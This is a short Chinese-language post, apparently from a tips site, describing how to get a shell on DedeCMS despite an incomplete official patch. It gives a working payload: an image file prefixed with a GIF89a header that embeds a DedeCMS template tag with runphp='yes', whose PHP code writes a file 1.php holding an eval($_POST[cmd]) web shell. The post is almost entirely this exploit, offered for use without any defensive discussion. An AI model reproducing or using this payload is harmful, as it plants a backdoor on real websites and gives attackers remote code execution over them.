织梦DEDECMS补丁后的getshell -电脑资料

    还是上次的那个dede getshell 漏洞 ，只不过官方的补丁没有补到位，

织梦DEDECMS补丁后的getshell

    现在其基础上，修改图片代码实现最新版本补丁突破。

    找一张图片，在保留图片代码的同时，插入如下代码

    GIF89aGIF89a {dede:name runphp='yes'}

    $fp = @fopen("1.php", 'a');

    @fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");

    @fclose($fp);

    {/dede:name}